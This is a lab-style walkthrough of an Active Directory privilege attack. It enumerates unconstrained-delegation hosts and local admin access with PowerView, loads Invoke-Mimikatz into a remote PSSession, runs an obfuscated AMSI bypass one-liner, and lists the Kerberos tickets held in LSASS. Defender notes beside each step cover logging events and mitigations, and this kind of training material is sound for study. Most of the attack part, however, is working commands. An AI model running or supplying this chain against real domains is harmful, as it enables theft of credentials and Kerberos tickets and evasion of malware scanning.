Now enumerate the computers that have unconstrained delegation enabled:
# Dot-source PowerView so its functions are defined in the current session.
. .\\powerview.ps1
# PowerView: list computer objects with unconstrained delegation enabled (the
# TRUSTED_FOR_DELEGATION bit, 0x80000, in userAccountControl).
# Domain controllers carry this flag by default, so they normally appear in
# the output as well.
# Defender note: the same query works as an audit; any non-DC host it returns
# is a candidate for constrained or resource-based constrained delegation.
Get-NetComputer -Unconstrained

As we see, the computer WIN-Q4788GPE9L7 has unconstrained delegation enabled. Next, check where our user has local admin access:
# PowerView: report the domain computers on which the current user has local
# administrator rights.
# Defender note: the check contacts many hosts in a short time, so one
# workstation producing network logons (event 4624, logon type 3) across many
# machines is the pattern to look for - confirm against your own telemetry.
Find-LocalAdminAccess

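As we see, our user has local admin access on the computer with unconstrained delegation. A host with unconstrained delegation keeps the TGTs of users who authenticate to it in LSASS memory, which is why admin access on it matters.
So let’s abuse this now and try to dump its secrets: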
# Enable-PSRemoting configures the *local* machine to accept remoting.
# NOTE(review): an outbound New-PSSession does not need it, and it leaves a
# WinRM listener enabled on this workstation - confirm it is wanted here.
Enable-PSRemoting
# Open a persistent PowerShell remoting (WinRM) session to the host identified
# above and keep a handle to it in $sess.
$sess = New-PSSession -ComputerName WIN-Q4788GPE9L7
# Run the local Invoke-Mimikatz.ps1 inside that session so the function is
# defined remotely; the script content travels over the remoting channel.
# Defender note: with script block logging enabled on the target, the script
# text is recorded there (event 4104), and the remote side runs under
# wsmprovhost.exe.
Invoke-Command -FilePath ..\\..\\rem01x.crtp\\Desktop\\tools\\Invoke-Mimikatz.ps1 -Session $sess
# Switch to an interactive prompt inside the same session.
Enter-PSSession -Session $sess
now let’s bypass AMSI
# What this line does once the string pieces are joined: it looks up the type
# System.Management.Automation.AmsiUtils through reflection and sets its
# non-public static field amsiInitFailed to $true, so AMSI scanning is treated
# as failed for the current PowerShell process only.
# The backticks, mixed case and -f format strings change nothing at run time;
# they only break up the text that static signatures would match on.
# Defender note: a command line or script block dense with backtick escapes and
# split/concatenated strings is itself a useful detection signal, and script
# block logging (event 4104) still records the line as typed.
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Now let’s try to dump the secrets, starting by listing all the available tickets:
# sekurlsa::tickets lists the Kerberos tickets held in LSASS memory on this
# host. As written it only lists them; no export option is given.
# On a host with unconstrained delegation the list includes the forwarded TGTs
# of users who authenticated to it, which is what makes such hosts sensitive.
# Defender note: reading LSASS needs administrator rights on the host. Relevant
# controls are LSA protection (RunAsPPL), the Protected Users group, and the
# "Account is sensitive and cannot be delegated" flag on privileged accounts.
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
